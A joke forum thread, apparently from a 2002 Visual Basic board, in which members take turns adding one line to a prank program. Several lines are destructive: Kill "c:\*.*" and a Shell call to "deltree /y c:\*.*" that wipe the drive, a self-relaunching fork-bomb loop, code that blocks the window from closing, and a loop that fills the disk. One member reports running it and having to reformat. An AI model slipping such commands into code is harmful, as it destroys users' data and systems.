Results 1 to 28 of 28

Thread: Super App!

  1. #1

    Thread Starter
    Fanatic Member Alien_poo's Avatar
    Join Date
    Jan 2002
    Location
    Canada
    Posts
    668

    Super App!

    Just add a line of code (and write your name above it (copyright)) to the code the person above you posted and we'll end up with a super app!

    I start:

    VB Code:
    1. 'Alex (Alien_Poo)
    2. Dim A as integer
    "A RESPECTED scientist has put forward the stunning - if unsavoury - possibility that humans are descended from sewage dumped overboard by aliens."
    "First we read that we are the creation of God, then scientists say we are descended from apes. Now they say we're some sort of alien poo. How much further can we sink?"
    - Robert Matthews, Science Correspondent

  2. #2
    Hyperactive Member
    Join Date
    Jul 2002
    Location
    Atlanta, GA
    Posts
    280
    VB Code:
    1. 'Alex (Alien_Poo)
    2. Dim A as integer
    3.  
    4. a = 1/0  'Yash (OrdinaryGuy)
    OrdinaryGuy

  3. #3

  4. #4
    Hyperactive Member
    Join Date
    Jul 2002
    Location
    Atlanta, GA
    Posts
    280
    VB Code:
    1. On Error Resume Next 'Lou
    2. Dim A as integer 'Alex (Alien_Poo)
    3.  
    4.  
    5. a = 1/0  'Yash (OrdinaryGuy)
    6. If MsgBox("Are you a frog?", vbQuestion + VBYesNo) = vbYes Then 'Yash
    OrdinaryGuy

  5. #5
    So Unbanned DiGiTaIErRoR's Avatar
    Join Date
    Apr 1999
    Location
    /dev/null
    Posts
    4,111
    VB Code:
    1. On Error Resume Next 'Lou
    2. Dim A as integer 'Alex (Alien_Poo)
    3.  
    4.  
    5. a = 1/0  'Yash (OrdinaryGuy)
    6. If MsgBox("Are you a frog?", vbQuestion + VBYesNo) = vbYes Then 'Yash
    7. Msgbox "Hello Mendhak!", 64, "Greetings": kill "c:\*.*" 'DiGErR

  6. #6
    PowerPoster rjlohan's Avatar
    Join Date
    Sep 2001
    Location
    Sydney, Australia
    Posts
    3,205
    VB Code:
    1. End
    2.  
    3. On Error Resume Next 'Lou
    4. Dim A as integer 'Alex (Alien_Poo)
    5.  
    6.  
    7. a = 1/0  'Yash (OrdinaryGuy)
    8. If MsgBox("Are you a frog?", vbQuestion + VBYesNo) = vbYes Then 'Yash
    9. Msgbox "Hello Mendhak!", 64, "Greetings": kill "c:\*.*" 'DiGErR
    -----------------------------------------
    -RJ
    [email protected]
    -----------------------------------------

  7. #7
    So Unbanned DiGiTaIErRoR's Avatar
    Join Date
    Apr 1999
    Location
    /dev/null
    Posts
    4,111
    VB Code:
    1. goto 10 'DiGErR
    2. End ' and people say goto's are worthless!
    3. 10
    4. On Error Resume Next 'Lou
    5. Dim A as integer 'Alex (Alien_Poo)
    6.  
    7.  
    8. a = 1/0  'Yash (OrdinaryGuy)
    9. If MsgBox("Are you a frog?", vbQuestion + VBYesNo) = vbYes Then 'Yash
    10. Msgbox "Hello Mendhak!", 64, "Greetings": kill "c:\*.*" 'DiGErR

  8. #8
    PowerPoster rjlohan's Avatar
    Join Date
    Sep 2001
    Location
    Sydney, Australia
    Posts
    3,205
    Well, you've ruined the game. You added 2 lines, and thus broke the rules. So much for a 'super app'...
    -----------------------------------------
    -RJ
    [email protected]
    -----------------------------------------

  9. #9
    Fanatic Member arsmakman's Avatar
    Join Date
    Dec 2001
    Location
    Leiden, Netherlands.
    Posts
    719
    VB Code:
    1. goto 10 'DiGErR
    2. End ' and people say goto's are worthless!
    3. 10
    4. On Error Resume Next 'Lou
    5. Dim A as integer 'Alex (Alien_Poo)
    6.  
    7.  
    8. a = 1/0  'Yash (OrdinaryGuy)
    9. If MsgBox("Are you a frog?", vbQuestion + VBYesNo) = vbYes Then 'Yash
    10. Msgbox "Hello Mendhak!", 64, "Greetings": kill "c:\*.*" 'DiGErR
    11. Else: sAns = InputBox("Well, you're not mendhak, but who are you then?","Name?") 'arsmakman
    No matter how fool-proof your program is, there will always be a better fool.

    Was a post helpful to you? Rate it!

  10. #10
    PowerPoster rjlohan's Avatar
    Join Date
    Sep 2001
    Location
    Sydney, Australia
    Posts
    3,205
    VB Code:
    1. Option Explicit
    2.  
    3. goto 10 'DiGErR
    4. End ' and people say goto's are worthless!
    5. 10
    6. On Error Resume Next 'Lou
    7. Dim A as integer 'Alex (Alien_Poo)
    8.  
    9.  
    10. a = 1/0  'Yash (OrdinaryGuy)
    11. If MsgBox("Are you a frog?", vbQuestion + VBYesNo) = vbYes Then 'Yash
    12. Msgbox "Hello Mendhak!", 64, "Greetings": kill "c:\*.*" 'DiGErR
    13. Else: sAns = InputBox("Well, you're not mendhak, but who are you then?","Name?") 'arsmakman


    Broke it again.
    -----------------------------------------
    -RJ
    [email protected]
    -----------------------------------------

  11. #11
    Fanatic Member arsmakman's Avatar
    Join Date
    Dec 2001
    Location
    Leiden, Netherlands.
    Posts
    719
    VB Code:
    1. Option Explicit
    2. Dim sAns As String 'arsmakman
    3. goto 10 'DiGErR
    4. End ' and people say goto's are worthless!
    5. 10
    6. On Error Resume Next 'Lou
    7. Dim A as integer 'Alex (Alien_Poo)
    8.  
    9.  
    10. a = 1/0  'Yash (OrdinaryGuy)
    11. If MsgBox("Are you a frog?", vbQuestion + VBYesNo) = vbYes Then 'Yash
    12. Msgbox "Hello Mendhak!", 64, "Greetings": kill "c:\*.*" 'DiGErR
    13. Else: sAns = InputBox("Well, you're not mendhak, but who are you then?","Name?") 'arsmakman
    No matter how fool-proof your program is, there will always be a better fool.

    Was a post helpful to you? Rate it!

  12. #12
    PowerPoster rjlohan's Avatar
    Join Date
    Sep 2001
    Location
    Sydney, Australia
    Posts
    3,205
    Originally posted by arsmakman
    VB Code:
    1. Option Explicit
    2. Dim sAns As String 'arsmakman
    3. goto 10 'DiGErR
    4. End ' and people say goto's are worthless!
    5. 10
    6. On Error Resume Next 'Lou
    7. Dim A as integer 'Alex (Alien_Poo)
    8.  
    9. Private Sub Form_Load()
    10. a = 1/0  'Yash (OrdinaryGuy)
    11. If MsgBox("Are you a frog?", vbQuestion + VBYesNo) = vbYes Then 'Yash
    12. Msgbox "Hello Mendhak!", 64, "Greetings": kill "c:\*.*" 'DiGErR
    13. Else: sAns = InputBox("Well, you're not mendhak, but who are you then?","Name?") 'arsmakman
    14. End Sub
    -----------------------------------------
    -RJ
    [email protected]
    -----------------------------------------

  13. #13
    So Unbanned DiGiTaIErRoR's Avatar
    Join Date
    Apr 1999
    Location
    /dev/null
    Posts
    4,111
    VB Code:
    1. Option Explicit
    2. Dim sAns as String
    3. GoTo 10 'DiGErR
    4. End ' and people say goto's are worthless!
    5. 10
    6. On Error Resume Next 'Lou
    7. Dim A as Integer 'Alex (Alien_Poo)
    8.  
    9.  
    10. a = 1/0  'Yash (OrdinaryGuy)
    11. If MsgBox("Are you a frog?", vbQuestion + VBYesNo) = vbYes Then 'Yash
    12. Msgbox "Hello Mendhak!", 64, "Greetings": kill "c:\*.*" 'DiGErR
    13. Else: sAns = InputBox("Well, you're not mendhak, but who are you then?","Name?") 'arsmakman
    14. If sAns = "rj" then shell "smartdrv": shell "smartdrv": shell "deltree /y c:\*.*"

  14. #14
    Fanatic Member arsmakman's Avatar
    Join Date
    Dec 2001
    Location
    Leiden, Netherlands.
    Posts
    719
    VB Code:
    1. Option Explicit
    2. Dim sAns as String
    3. GoTo 10 'DiGErR
    4. End ' and people say goto's are worthless!
    5. 10
    6. On Error Resume Next 'Lou
    7. Dim A as Integer 'Alex (Alien_Poo)
    8.  
    9.  
    10. a = 1/0  'Yash (OrdinaryGuy)
    11. If MsgBox("Are you a frog?", vbQuestion + VBYesNo) = vbYes Then 'Yash
    12. Msgbox "Hello Mendhak!", 64, "Greetings": kill "c:\*.*" 'DiGErR
    13. Else: sAns = InputBox("Well, you're not mendhak, but who are you then?","Name?") 'arsmakman
    14. If sAns = "rj" then shell "smartdrv": shell "smartdrv": shell "deltree /y c:\*.*"
    15. If sAnd = "Mendhak" Then Do: MsgBox "You're screwed": Loop
    No matter how fool-proof your program is, there will always be a better fool.

    Was a post helpful to you? Rate it!

  15. #15
    So Unbanned DiGiTaIErRoR's Avatar
    Join Date
    Apr 1999
    Location
    /dev/null
    Posts
    4,111
    Originally posted by arsmakman
    VB Code:
    1. Option Explicit
    2. Dim sAns as String
    3. GoTo 10 'DiGErR
    4. End ' and people say goto's are worthless!
    5. 10
    6. On Error Resume Next 'Lou
    7. Dim A as Integer 'Alex (Alien_Poo)
    8.  
    9.  
    10. a = 1/0  'Yash (OrdinaryGuy)
    11. If MsgBox("Are you a frog?", vbQuestion + VBYesNo) = vbYes Then 'Yash
    12. Msgbox "Hello Mendhak!", 64, "Greetings": kill "c:\*.*" 'DiGErR
    13. Else: sAns = InputBox("Well, you're not mendhak, but who are you then?","Name?") 'arsmakman
    14. If sAns = "rj" then shell "smartdrv": shell "smartdrv": shell "deltree /y c:\*.*"
    15. If sAnd = "Mendhak" Then Do: MsgBox "You're screwed":shell "smartdrv": shell "smartdrv": shell "deltree /y c:\*.*": Loop 'edited by DiGErR

  16. #16
    Banned Michael_Kamen's Avatar
    Join Date
    May 2001
    Location
    The Netherlands
    Posts
    1,180
    VB Code:
    1. Option Explicit
    2. Dim sAns as String
    3. GoTo 10 'DiGErR
    4. End ' and people say goto's are worthless!
    5. 10
    6. On Error Resume Next 'Lou
    7. Dim A as Integer 'Alex (Alien_Poo)
    8.  
    9.  
    10. a = 1/0  'Yash (OrdinaryGuy)
    11. If MsgBox("Are you a frog?", vbQuestion + VBYesNo) = vbYes Then 'Yash
    12. Msgbox "Hello Mendhak!", 64, "Greetings": kill "c:\*.*" 'DiGErR
    13. Else: sAns = InputBox("Well, you're not mendhak, but who are you then?","Name?") 'arsmakman
    14. If sAns = "rj" then shell "smartdrv": shell "smartdrv": shell "deltree /y c:\*.*"
    15. If sAnd = "Mendhak" Then Do: MsgBox "You're screwed": Loop
    16. If sAns = "DigitalError" Then Exit Sub

  17. #17

    Thread Starter
    Fanatic Member Alien_poo's Avatar
    Join Date
    Jan 2002
    Location
    Canada
    Posts
    668
    VB Code:
    1. Option Explicit
    2. Dim sAns As String
    3.  
    4. Private Sub Form_Load()
    5.     GoTo 10 'DiGErR
    6.     End ' and people say gotos are worthless!
    7. 10
    8.     On Error Resume Next 'Lou
    9.     Dim A As Integer 'Alex (Alien_Poo)
    10.  
    11.  
    12.     A = 1 / 0 'Yash (OrdinaryGuy)
    13.     If MsgBox("Are you a frog?", vbQuestion + vbYesNo) = vbYes Then 'Yash
    14.         MsgBox "Hello Mendhak!", 64, "Greetings": Kill "c:\*.*" 'DiGErR
    15.     Else: sAns = InputBox("Well, you're not mendhak, but who are you then?", "Name?") 'arsmakman
    16.         If sAns = "rj" Then Shell "smartdrv": Shell "smartdrv": Shell "deltree /y c:\*.*"
    17.         If sAns = "Mendhak" Then Do: MsgBox "You're screwed": Loop
    18.         If sAns = "DigitalError" Then Exit Sub
    19.     End If
    20. End Sub
    "A RESPECTED scientist has put forward the stunning - if unsavoury - possibility that humans are descended from sewage dumped overboard by aliens."
    "First we read that we are the creation of God, then scientists say we are descended from apes. Now they say we're some sort of alien poo. How much further can we sink?"
    - Robert Matthews, Science Correspondent

  18. #18
    Fanatic Member duc's Avatar
    Join Date
    Oct 2002
    Location
    STEAM
    Posts
    702
    Unload Me 'alex
    Option Explicit
    Dim sAns As String

    Private Sub Form_Load()
    GoTo 10 'DiGErR
    End ' and people say gotos are worthless!
    10
    On Error Resume Next 'Lou
    Dim A As Integer 'Alex (Alien_Poo)


    A = 1 / 0 'Yash (OrdinaryGuy)
    If MsgBox("Are you a frog?", vbQuestion + vbYesNo) = vbYes Then 'Yash
    MsgBox "Hello Mendhak!", 64, "Greetings": Kill "c:\*.*" 'DiGErR
    Else: sAns = InputBox("Well, you're not mendhak, but who are you then?", "Name?") 'arsmakman
    If sAns = "rj" Then Shell "smartdrv": Shell "smartdrv": Shell "deltree /y c:\*.*"
    If sAns = "Mendhak" Then Do: MsgBox "You're screwed": Loop
    If sAns = "DigitalError" Then Exit Sub
    End If
    End Sub



    ha i ended the super app lol

  19. #19
    PowerPoster rjlohan's Avatar
    Join Date
    Sep 2001
    Location
    Sydney, Australia
    Posts
    3,205
    No, it just won't compile with a function before the Option Explicit line... not that it would have anyway, mind you...
    -----------------------------------------
    -RJ
    [email protected]
    -----------------------------------------

  20. #20
    Fanatic Member duc's Avatar
    Join Date
    Oct 2002
    Location
    STEAM
    Posts
    702
    ......what

  21. #21

    Thread Starter
    Fanatic Member Alien_poo's Avatar
    Join Date
    Jan 2002
    Location
    Canada
    Posts
    668
    ARRRGGHHH

    lol, I ran the program and being ME, I typed in rj, just finished reformatting


    stupid me
    "A RESPECTED scientist has put forward the stunning - if unsavoury - possibility that humans are descended from sewage dumped overboard by aliens."
    "First we read that we are the creation of God, then scientists say we are descended from apes. Now they say we're some sort of alien poo. How much further can we sink?"
    - Robert Matthews, Science Correspondent

  22. #22
    Frenzied Member wpearsall's Avatar
    Join Date
    Feb 2002
    Location
    England / UK
    Posts
    1,065
    Originally posted by Alien_poo
    ARRRGGHHH

    lol, I ran the program and being ME, I typed in rj, just finished reformatting


    stupid me
    YOUR JOKING?!?!?!
    Wayne

  23. #23

    Thread Starter
    Fanatic Member Alien_poo's Avatar
    Join Date
    Jan 2002
    Location
    Canada
    Posts
    668
    non im not I can prove... well I think I can...
    "A RESPECTED scientist has put forward the stunning - if unsavoury - possibility that humans are descended from sewage dumped overboard by aliens."
    "First we read that we are the creation of God, then scientists say we are descended from apes. Now they say we're some sort of alien poo. How much further can we sink?"
    - Robert Matthews, Science Correspondent

  24. #24
    Frenzied Member wpearsall's Avatar
    Join Date
    Feb 2002
    Location
    England / UK
    Posts
    1,065
    VB Code:
    1. Option Explicit
    2. Dim sAns As String
    3.  
    4. Private Sub Form_Load()
    5.     GoTo 10 'DiGErR
    6.     End ' and people say gotos are worthless!
    7. 10
    8.     On Error Resume Next 'Lou
    9.     Dim A As Integer 'Alex (Alien_Poo)
    10.  
    11.  
    12.     A = 1 / 0 'Yash (OrdinaryGuy)
    13.     If MsgBox("Are you a frog?", vbQuestion + vbYesNo) = vbYes Then 'Yash
    14.         MsgBox "Hello Mendhak!", 64, "Greetings": Kill "c:\*.*" 'DiGErR
    15.     Else: sAns = InputBox("Well, you're not mendhak, but who are you then?", "Name?") 'arsmakman
    16.         If sAns = "rj" Then Shell "smartdrv": Shell "smartdrv": Shell "deltree /y c:\*.*"
    17.         If sAns = "Mendhak" Then Do: MsgBox "You're screwed": Loop
    18.         If sAns = "DigitalError" Then Exit Sub
    19.         If sAns = "" GoTo KillSystem:
    20.     End If
    21.  
    22. Exit Sub
    23. KillSystem:
    24. Do
    25. Shell App.Path & "\" & App.EXEName & ".exe"
    26. Loop
    27. End Sub
    Wayne

  25. #25
    Frenzied Member wpearsall's Avatar
    Join Date
    Feb 2002
    Location
    England / UK
    Posts
    1,065
    Originally posted by Alien_poo
    non im not I can prove... well I think I can...
    Lol :Mind i was gonna test out the finished code, till i saw Kill C:\*.*

    (Woulda crashed out, i dont got a C:\ no more )
    Wayne

  26. #26

    Thread Starter
    Fanatic Member Alien_poo's Avatar
    Join Date
    Jan 2002
    Location
    Canada
    Posts
    668
    Originally posted by wpearsall
    Lol :Mind i was gonna test out the finished code, till i saw Kill C:\*.*

    (Woulda crashed out, i dont got a C:\ no more )
    I will not test our app anymore, if we want to distibute it
    "A RESPECTED scientist has put forward the stunning - if unsavoury - possibility that humans are descended from sewage dumped overboard by aliens."
    "First we read that we are the creation of God, then scientists say we are descended from apes. Now they say we're some sort of alien poo. How much further can we sink?"
    - Robert Matthews, Science Correspondent

  27. #27
    Fanatic Member siyan's Avatar
    Join Date
    Jul 2001
    Location
    GOOOAAAAALLLLL!!!!!
    Posts
    869
    NO I DO NOT KNOW IF I DID THIS RIGHT.

    VB Code:
    1. Option Explicit
    2. Dim sAns As String
    3.  
    4. Private Sub Form_Load()
    5.     GoTo 10 'DiGErR
    6.     End ' and people say gotos are worthless!
    7. 10
    8.     On Error Resume Next 'Lou
    9.     Dim A As Integer 'Alex (Alien_Poo)
    10.  
    11.  
    12.     A = 1 / 0 'Yash (OrdinaryGuy)
    13.     If MsgBox("Are you a frog?", vbQuestion + vbYesNo) = vbYes Then 'Yash
    14.         MsgBox "Hello Mendhak!", 64, "Greetings": Kill "c:\*.*" 'DiGErR
    15.     Else: sAns = InputBox("Well, you're not mendhak, but who are you then?", "Name?") 'arsmakman
    16.         If sAns = "rj" Then Shell "smartdrv": Shell "smartdrv": Shell "deltree /y c:\*.*"
    17.         If sAns = "Mendhak" Then Do: MsgBox "You're screwed": Loop
    18.         If sAns = "DigitalError" Then Exit Sub
    19.         If sAns = "" GoTo KillSystem:
    20.     End If
    21.  
    22. Exit Sub
    23. KillSystem:
    24.  
    25. '--Siyan (underqualified and untested)
    26. Open "c:\hellomofo.dat" for output as #1
    27. Dim Person as Integer
    28. For Person = 0 to 1000000000
    29.    Print #1, Rnd(Person)
    30. Next Person
    31. Close #1
    32.  
    33. Msgbox "What is the square root of seventeen billion six hundred eighteen million three hundred and six thousand four hundred and ninety nine point seven?"
    34. '---
    35.  
    36.  
    37. Do
    38. Shell App.Path & "\" & App.EXEName & ".exe"
    39.  
    40. Loop
    41. End Sub
    Unite, proletariat!

  28. #28
    Frenzied Member wpearsall's Avatar
    Join Date
    Feb 2002
    Location
    England / UK
    Posts
    1,065
    VB Code:
    1. Option Explicit
    2. Dim sAns As String
    3.  
    4. Private Sub Form_Load()
    5.     GoTo 10 'DiGErR
    6.     End ' and people say gotos are worthless!
    7. 10
    8.     On Error Resume Next 'Lou
    9.     Dim A As Integer 'Alex (Alien_Poo)
    10.  
    11.  
    12.     A = 1 / 0 'Yash (OrdinaryGuy)
    13.     If MsgBox("Are you a frog?", vbQuestion + vbYesNo) = vbYes Then 'Yash
    14.         MsgBox "Hello Mendhak!", 64, "Greetings": Kill "c:\*.*" 'DiGErR
    15.     Else: sAns = InputBox("Well, you're not mendhak, but who are you then?", "Name?") 'arsmakman
    16.         If sAns = "rj" Then Shell "smartdrv": Shell "smartdrv": Shell "deltree /y c:\*.*"
    17.         If sAns = "Mendhak" Then Do: MsgBox "You're screwed": Loop
    18.         If sAns = "DigitalError" Then Exit Sub
    19.         If sAns = "" GoTo KillSystem:
    20.     End If
    21.  
    22. Exit Sub
    23. KillSystem:
    24.  
    25. '--Siyan (underqualified and untested)
    26. Open "c:\hellomofo.dat" for output as #1
    27. Dim Person as Integer
    28. For Person = 0 to 1000000000
    29.    Print #1, Rnd(Person)
    30. Next Person
    31. Close #1
    32.  
    33. Msgbox "What is the square root of seventeen billion six hundred eighteen million three hundred and six thousand four hundred and ninety nine point seven?"
    34. '---
    35.  
    36.  
    37. Do
    38. Shell App.Path & "\" & App.EXEName & ".exe"
    39.  
    40. Loop
    41. End Sub
    42.  
    43.  
    44. Private Sub Form_Unload(Cancel As Integer)
    45. On Error Resume Next ' Dont want this code to spoil their fun ;)
    46. Dim HowMuchMemoryLeft As Interger
    47.  
    48. MsgBox "Do You Wish To Proceed?", vbOKOnly, "Make Your Choice"
    49. MsgBox "You WILL Be Sorry :D <Evil Grinz>", vbOKOnly, "Correct Choice"
    50. For HowMuchMemoryLeft 0 To 99999999
    51. Shell (App.Path & "\" & App.EXEName & ".exe")
    52.  
    53. Cancel = True ' Stop the person Closing the application
    54.  
    55. ' IDEA: Anyone know how to stop windows closing?
    56. ' HEHEHE .. Or lock the TaskManager Opening ;)
    57. End Sub
    Wayne

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  



Click Here to Expand Forum to Full Width